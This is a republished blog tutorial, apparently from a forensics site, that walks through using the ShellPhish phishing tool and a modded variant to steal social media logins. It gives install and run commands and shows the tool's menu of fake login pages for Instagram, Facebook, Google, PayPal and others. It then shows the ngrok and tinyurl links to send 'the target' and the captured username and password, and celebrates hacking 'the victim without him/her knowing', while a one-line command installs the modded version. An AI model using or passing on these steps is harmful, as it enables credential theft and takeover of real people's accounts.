How To Hack Any Social Media Account with ShellPhish and ShellPhish+

DISCLAIMER: The author and the publishing website (Computer Forensics Lab) assume no responsibility for any misuse or damage caused by Shellphish. This is republished here for educational purposes ONLY.

Image for post
ShellPhish

Inthis article we are going to see how we can hack any social media account using a tool called ShellPhish from GitHub. So you want to hack an Instagram account or Facebook account or any other social media account…..??. Well you have come to the right place. So lets get started, shall we 🙂

Before we get into any technical stuff,

What is ShellPhish ?

ShellPhish is a phishing tool written in bash by thelinuxchoiceIt offers a total of 18 phishing websites and one custom website which you can send to the target and after they login, bingo you have the creds. The good thing about this tool is that you don’t have to go through the hassle of setting up a hosting service or port forwarding. Yes, you guessed it right it does everything by itself, awesome right…… ? :0

It uses Ngrok for port forwarding and PHP server to host all the phishing websites.

What is Ngrok ?

Ngrok exposes local servers behind NATs and firewalls to the public internet over secure tunnels.

How it works ?

You download and run a program on your machine and provide it the port of a network service, usually a web server.

It connects to the ngrok cloud service which accepts traffic on a public address and relays that traffic through to the ngrok process running on your machine and then on to the local address you specified.

Legal disclaimer:

Usage of Shellphish for attacking targets without prior mutual consent is illegal. It’s the end user’s responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Now let’s see how we can install this awesome tool in your Linux system.

Installation

We will use git to download this tool directly from GitHub or you can download the zip and install. Git is installed by default on most of the Linux machines if it’s not installed follow any tutorial online to know-how.

git clone https://github.com/thelinuxchoice/shellphish.git

Now we have ShellPhish downloaded.

root@kali:~# git clone https://github.com/thelinuxchoice/shellphish.git
Cloning into 'shellphish'...
remote: Enumerating objects: 521, done.
remote: Counting objects: 100% (521/521), done.
remote: Compressing objects: 100% (332/332), done.
remote: Total 521 (delta 188), reused 506 (delta 182), pack-reused 0
Receiving objects: 100% (521/521), 13.13 MiB | 1.87 MiB/s, done.
Resolving deltas: 100% (188/188), done.

Now let’s see what is inside

root@kali:~/shellphish# ls
LICENSE README.md shellphish.sh sites

we are pretty much done here although I am going to walk you through the steps until we get the creds ;). All we need is to run the shellphish.sh script and we are good to go.

Before we run the script lets check the file with ls -la

root@kali:~/shellphish# ls -latotal 72
drwxr-xr-x 4 root root 4096 May 3 12:03 .
drwxr-xr-x 14 root root 4096 May 3 12:03 ..
drwxr-xr-x 8 root root 4096 May 3 12:03 .git
-rw-r--r-- 1 root root 35265 May 3 12:03 LICENSE
-rw-r--r-- 1 root root 1433 May 3 12:03 README.md
-rw-r--r-- 1 root root 15297 May 3 12:03 shellphish.sh
drwxr-xr-x 21 root root 4096 May 3 12:03 sites

Uh-oh we don’t have the execute permissions lets give the script those executable permissions by

chmod +x shellphish.sh

Now we can run the script with any of the commands down below

# ./shellphish.sh# bash shellscript.sh

If you don’t have Ngrok installed don’t worry this will install it for you.

     _     _             _  _  ______   _      _        _      
| | | | | || |(_____ \ | | (_) | |
\ \ | | _ ____ | || | _____) )| | _ _ ___ | | _
\ \ | || \ / _ )| || || ____/ | || \ | | /___)| || \
_____) )| | | |( (/ / | || || | | | | || ||___ || | | |
(______/ |_| |_| \____)|_||_||_| |_| |_||_|(___/ |_| |_| v1.8.:.:. Phishing Tool coded by: @linux_choice .:.:.:: Disclaimer: Developers assume no liability and are not ::
:: responsible for any misuse or damage caused by ShellPhish ::[01] Instagram [09] Origin [17] Gitlab
[02] Facebook [10] Steam [18] Pinterest
[03] Snapchat [11] Yahoo [19] Custom
[04] Twitter [12] Linkedin [99] Exit
[05] Github [13] Protonmail
[06] Google [14] WordPress
[07] Spotify [15] Microsoft
[08] Netflix [16] InstaFollowers[*] Choose an option:

This will prompt you to choose any option just choose whatever option you like. I am choosing option 1 Instagram.

[*] Choose an option: 1
[*] Downloading Ngrok...
[*] Starting php server...
[*] Starting ngrok server...
[*] Send this link to the Target: https://e27f9c07.ngrok.io[*] Or using tinyurl: http://tinyurl.com/ya25v565[*] Waiting IPs and Credentials, Press Ctrl + C to exit...

Now this will give two links

1) The one generated from the Ngrok server and
2) the one shortened

All you have to do now is to send any one of the links to the target and wait for them to log in.

Image for post
Login attempt with ngrok link

It doesn’t login you when you press the login rather it redirects to the authentic Instagram page which I think is helpful to fool the target.


[*] Waiting Credentials and Next IP, Press Ctrl + C to exit...[*] Credentials Found!
[*] Account: Pyroot
[*] Password: Password123
[*] Saved: sites/instagram/saved.usernames.txt

Hurrah……..!!!! we have successfully hacked the victim without him/her knowing.

Credits:

Author: github.com/thelinuxchoice

Twitter: twitter.com/linux_choice

Modded version of ShellPhish authored by @AbirHasan2005 making it ShellPhish v2.5. This will include the following:

ShellPhish v2.5-MOD

Phishing Tool for Facebook, Instagram, Google, Microsoft, Netflix, PayPal, Steam, Twitter, PlayStation, GitHub, Twitch, Pinterest, Snapchat, Linkedin, Ebay, Dropbox, Protonmail, Spotify, Reddit, Adobe, DeviantArt, Badoo, Origin, CryptoCoin, Yahoo, WordPress, Yandex, StachoverFlow & VK. This is a modified version of ShellFish, ShellPhish & Zphisher.

ChangeLog:

  • Updated to v2.5:
    • Added 2020 New Login/Phishing Page.
    • Added Traditional Login Page.
    • Added Advanced Voting Poll Login Page.
    • Added Fake Security Login Page.
    • Added Facebook Messenger Login Page.
    • Improvements in ShellPhish Logo.
    • Added New Sites.
    • Added 4 Port Forwarding Options.

List of available sites:

[01] Facebook     [11] Twitch       [21] DeviantArt
[02] Instagram    [12] Pinterest    [22] Badoo
[03] Google       [13] Snapchat     [23] Origin
[04] Microsoft    [14] Linkedin     [24] CryptoCoin
[05] Netflix      [15] Ebay         [25] Yahoo
[06] PayPal       [16] Dropbox      [26] WordPress
[07] Steam        [17] Protonmail   [27] Yandex
[08] Twitter      [18] Spotify      [28] StackoverFlow
[09] PlayStation  [19] Reddit       [29] VK
[10] GitHub       [20] Adobe

Mod Features:

  • Colourized Text
  • Animations
  • In-built Setup for Termux
  • More extra features
  • More improvements
  • Bugs cleared
  • Fixed URL not showing
Screenshot
Screenshot_FB

Usage:

apt update && apt upgrade -y && apt install git wget php unzip curl -y && git clone https://github.com/AbirHasan2005/ShellPhish && cd ShellPhish && chmod +x * && bash shellphish.sh

How to Update:

cd ShellPhish
bash update.sh

Note:

This is in development. If you find any problems than please report them to my Telegram Group. To work properly in Android you have to Turn On Mobile Data and Hotspot. Without Mobile Data and Hotspot sometimes it not generates Phishing URL.

Modified by @AbirHasan2005
TheLinuxChoice: https://github.com/thelinuxchoice
DarksecDevelopers: https://github.com/DarksecDevelopers
UndeadSec: https://github.com/UndeadSec
HTR-TECH: https://github.com/htr-tech
Here sites folder collected from ZPhisher (https://github.com/htr-tech/zphisher)
For any kind of help, support, suggetion and request ask in my Telegram Group:

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.